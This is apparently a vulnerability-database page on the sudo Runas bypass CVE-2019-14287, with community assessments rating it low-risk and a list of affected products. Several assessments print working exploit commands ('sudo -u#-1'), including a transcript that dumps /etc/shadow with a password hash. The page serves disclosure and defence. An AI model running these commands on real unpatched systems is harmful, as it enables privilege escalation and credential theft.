Low
CVE-2019-14287
CVE-2019-14287
Description
In Sudo before 1.8.28, an attacker with access to a Runas ALL sudoer account can bypass certain policy blacklists and session PAM modules, and can cause incorrect logging, by invoking sudo with a crafted user ID. For example, this allows bypass of !root configuration, and USER= logging, for a “sudo -u #$((0xffffffff))” command.
Add Assessment
Technical Analysis
Due to being almost 100% non-existent in the wild, this is only useful in CTF environments. The exploit is extremely easy to trigger, and I weep for the machine that has this configured in the wild.
Technical Analysis
While this is easy to exploit and low risk to the stability of the target system, it is post-exploitation, and highly dependent on a relatively uncommon and paranoid type of configuration where an administrator is actively monitoring trusted or untrusted users on a multi-user system. There may be some way to leverage this as a primitive for a different kind of exploit chain, but more often than not users are allowed to just pivot into root directly, or specific privileged executables are escalated with setuid rather than sudo.
Someone somewhere has a that golden target, and is having a field day. Everyone else had root anyway :)
Other related vuln possibilities could be auditing everything that checks UID_MAX / GID_MAX to see if seteuid/setegid failures are detected.
useradd doesn’t detect a problem on Linux but adduser does
/usr/sbin/useradd -d /home/bcook-max -g bcook -s /bin/bash -u 4294967295 bcook-max useradd: invalid user ID '4294967295'
vipw is fine with this uid, but su fails
# grep max /etc/passwd bcook-max:x:4294967295:1000::/home/bcook-max:/bin/bash ~ # su - bcook-max su: cannot set user id: Invalid argument
Completely agree. Just like Brent, when I first saw the OMG!!!! Sudo bypass as easy as ‘-u’ I was super concerned, so I tried it out on a fairly stock Ubuntu, a popular Linux distro, and got:
> sudo -u -1 id sudo: unknown user: -1 sudo: unable to initialize policy plugin > sudo -u 4294967295 id sudo: unknown user: 4294967295 sudo: unable to initialize policy plugin
Then I got to the penultimate line of the article I was reading where it said “Since the attack works in a specific use case scenario of the sudoers configuration file, it should not affect a large number of users.”
Come on, people; be honest. Put that line in your opening paragraph! Should you patch? Yes! Should you be concerned this has torn through your mostly stock servers? Nope. The hype this got was way disproportional to the threat. There are far more scary privilege escalations for Linux out there, and this one is pretty easy to patch.
Technical Analysis
I’ve seen Runas specifications on exactly two servers in the wild. I think it’s even rarer that you would specify ALL and !root in the same specification, though it is a better application of the principle of least privilege.
More importantly, privilege escalation is contingent on having access to a command that can escape to a shell or otherwise execute arbitrary code or commands. Cool bug, but the use case for this is minimized.
Here’s a contrived example of the bug in action:
vagrant@ubuntu-xenial:~$ sudo -l Matching Defaults entries for vagrant on ubuntu-xenial: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User vagrant may run the following commands on ubuntu-xenial: (ALL, !root) NOPASSWD: /usr/bin/whoami vagrant@ubuntu-xenial:~$ sudo whoami [sudo] password for vagrant: Sorry, user vagrant is not allowed to execute '/usr/bin/whoami' as root on ubuntu-xenial. vagrant@ubuntu-xenial:~$ sudo -u ubuntu whoami ubuntu vagrant@ubuntu-xenial:~$ sudo -u#-1 whoami root vagrant@ubuntu-xenial:~$
You must specify # to use a UID.
Here’s another example where you’re not limited to a command, only the target users:
vagrant@ubuntu-xenial:~$ sudo -l Matching Defaults entries for vagrant on ubuntu-xenial: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User vagrant may run the following commands on ubuntu-xenial: (ALL, !root) NOPASSWD: ALL vagrant@ubuntu-xenial:~$ sudo whoami [sudo] password for vagrant: Sorry, user vagrant is not allowed to execute '/usr/bin/whoami' as root on ubuntu-xenial. vagrant@ubuntu-xenial:~$ sudo -u#-1 whoami root vagrant@ubuntu-xenial:~$ sudo -u#-1 cat /etc/shadow root:*:17897:0:99999:7::: daemon:*:17897:0:99999:7::: bin:*:17897:0:99999:7::: sys:*:17897:0:99999:7::: sync:*:17897:0:99999:7::: games:*:17897:0:99999:7::: man:*:17897:0:99999:7::: lp:*:17897:0:99999:7::: mail:*:17897:0:99999:7::: news:*:17897:0:99999:7::: uucp:*:17897:0:99999:7::: proxy:*:17897:0:99999:7::: www-data:*:17897:0:99999:7::: backup:*:17897:0:99999:7::: list:*:17897:0:99999:7::: irc:*:17897:0:99999:7::: gnats:*:17897:0:99999:7::: nobody:*:17897:0:99999:7::: systemd-timesync:*:17897:0:99999:7::: systemd-network:*:17897:0:99999:7::: systemd-resolve:*:17897:0:99999:7::: systemd-bus-proxy:*:17897:0:99999:7::: syslog:*:17897:0:99999:7::: _apt:*:17897:0:99999:7::: lxd:*:17897:0:99999:7::: messagebus:*:17897:0:99999:7::: uuidd:*:17897:0:99999:7::: dnsmasq:*:17897:0:99999:7::: sshd:*:17897:0:99999:7::: pollinate:*:17897:0:99999:7::: vagrant:$6$pjYWAc.5$QYfO.wN80gnGe2kC1jYmSTGmO/qelG1CMl6ubKMbDQt9b1TEKZ648PQGI7VC88XE3ObdPBswUavsC1eDVZunJ.:17897:0:99999:7::: ubuntu:!:18100:0:99999:7::: vagrant@ubuntu-xenial:~$
Technical Analysis
Patch, but don’t freak out.
Technical Analysis
As many others before me have stated, this CVE hold very little use other than in CTF environments.
To spot this vuln, look for a configuration similar to this one in the /etc/sudoers file:
<user> ALL=(ALL:!root) NOPASSWD: ALL
If the sudo version is below 1.8.28, and the above configuration is present, you can exploit as follows:
sudo -u#-1 <command>
You can also use the unsigned equivalent of -1: 4294967295.
To test this bug in a preconfigured environment, check out https://tryhackme.com/room/sudovulnsbypass .
CVSS V3 Severity and Metrics
General Information
Vendors
- canonical,
- debian,
- fedoraproject,
- netapp,
- opensuse,
- redhat,
- sudo project
Products
- debian linux 10.0,
- debian linux 8.0,
- debian linux 9.0,
- element software management node -,
- enterprise linux 8.0,
- enterprise linux desktop 6.0,
- enterprise linux desktop 7.0,
- enterprise linux eus 7.5,
- enterprise linux eus 7.6,
- enterprise linux eus 7.7,
- enterprise linux eus 8.1,
- enterprise linux eus 8.2,
- enterprise linux eus 8.4,
- enterprise linux server 5.0,
- enterprise linux server 6.0,
- enterprise linux server 7.0,
- enterprise linux server aus 6.5,
- enterprise linux server aus 6.6,
- enterprise linux server aus 7.2,
- enterprise linux server aus 7.3,
- enterprise linux server aus 7.4,
- enterprise linux server aus 7.6,
- enterprise linux server aus 7.7,
- enterprise linux server aus 8.2,
- enterprise linux server aus 8.4,
- enterprise linux server tus 7.2,
- enterprise linux server tus 7.3,
- enterprise linux server tus 7.4,
- enterprise linux server tus 7.6,
- enterprise linux server tus 7.7,
- enterprise linux server tus 8.2,
- enterprise linux server tus 8.4,
- enterprise linux workstation 6.0,
- enterprise linux workstation 7.0,
- fedora 29,
- fedora 30,
- fedora 31,
- leap 15.0,
- leap 15.1,
- openshift container platform 4.1,
- sudo,
- ubuntu linux 12.04,
- ubuntu linux 14.04,
- ubuntu linux 16.04,
- ubuntu linux 18.04,
- ubuntu linux 19.04,
- virtualization 4.2
References
Advisory
